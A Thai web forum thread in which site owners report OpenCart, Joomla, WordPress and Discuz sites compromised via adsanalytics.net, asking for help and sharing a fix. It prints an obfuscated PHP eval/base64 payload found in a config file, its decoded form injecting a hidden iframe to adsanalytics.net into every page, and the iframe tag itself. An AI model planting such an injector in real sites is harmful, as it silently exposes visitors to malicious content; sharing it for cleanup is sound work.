ระวังร้าน OpenCart ของท่าน โดนแฮ็ค ( stein.cz.cc , adsanalytics.net )

กระเทยหัวล้าน · 18 เมษายน 2010, 21:17:29

http://www.siamopencart.com/webboard/index.php/topic,365.0.html

รู้กันนานมากแล้วใน เว็บบอร์ดค่ะ!

iamway · 18 เมษายน 2010, 21:41:59

ผมโดนใน Joomla ครับ ไม่ได้ใช้ E-commerce ด้วย เป็นแค่เว็บคอนเทนต์ธรรมดา ไฟล์ Configuration.php โดนใส่ข้อความแบบนี้ครับ

eval(gzinflate(base64_decode('BcHbtkJAAADQz6mWB7og6zw5iFEpmYl6OWtcG6ZB4xJff/bOBkyXxUxYTnGXLWPMM2X3l2ZJnWbLxW/iuEkNRl03/Xlt2/pETg9Ya9S6VyZEvWRxpyrMGzHAg1Ax15SiFmJX5or6lhGJ7pD6SNzTg7d3o0A1Hh PaRuIM8bpVhduhAMURkCsWvKZnkbq76Ze5rwGL0bNKg8N098cBTXWxiYm9iEQk mtC59BWYY8hsTfNGwvpk9w36AsOGf3MMv bz1ztX2xGJPbXEwqU7rjC4KsQq4f3CrPI4unt6yuSOx2bzR7HXKyEF0TV8OLda MA1CGEhiWz/R3AXlSJvh L0UqFEG9H1YTTV2ON VJ3W81QlmjXbtPGxI0N6c2z0amHtPi vFFE7hMSt1WToGDdDExWq1 vkH')));/*^_^*/

ค้นในเน็ต มีคนเขาสอนถอดรหัส พอเอาไปถอดรหัสดู ก็เห็นเป็นคำสั่งแบบนี้ครับ

if(!defined('OBH')){define('OBH',1);function obh($b){return preg_replace('@<[ ]*/[ ]*html>@i', "$0n<iframe width=0 height=0 style="display:none" src="http://adsanalytics.net/in.cgi?3"></iframe>", $b);};ob_start('obh');}

ใครมีความรู้เรื่องภาษา php ช่วยแกะให้หน่อยครับว่ามันทำอะไรกับเว็บเราไปบ้าง

ขอบคุณครับ

mama2008 · 18 เมษายน 2010, 22:49:20

และ wp ใครรู้มั่งว่าต้องแก้ตรงไหนครับ ในเทมเพลตก็ไม่มี ในไฟล์ ของ wp ก็ไม่มีลองโหลดมาอัพทับไปหมดแล้ว เหลืออย่างเดียวว่าเค้าเอาไฟล์ .php มาเก็บที่ไหน

pramecomix · 19 เมษายน 2010, 14:50:55

ของผมติด adsanalytics.net เหมือนกัน ครับ

อ้างถึง<iframe width=0 height=0 style="display:none" src="http://adsanalytics.net/in.cgi?3 "></iframe>

ใช้บอร์ด discuz 6.1F

ตอนนี้แก้ไขได้แล้วครับ มึนมาหลายวันเลยทีเดียว

แก้โดยลบไฟล์ .htaccess ใน htdocs (ใช้ vhcs)
ลองดาวโหลด .htaccess มาดูนะครับ แล้วลองเลื่อนไปดูไฟล์ทั้งหมด มันแอบซ่อนอยู่

ขอบคุณ ibiznetwork.com // appservhostiing.com// คุณยิ่ง KMUTT //FordAntitrust
ที่มาช่วยกันหาสาเหตุครับ

ระวังร้าน OpenCart ของท่าน โดนแฮ็ค ( stein.cz.cc , adsanalytics.net )

กระเทยหัวล้าน

iamway

mama2008

pramecomix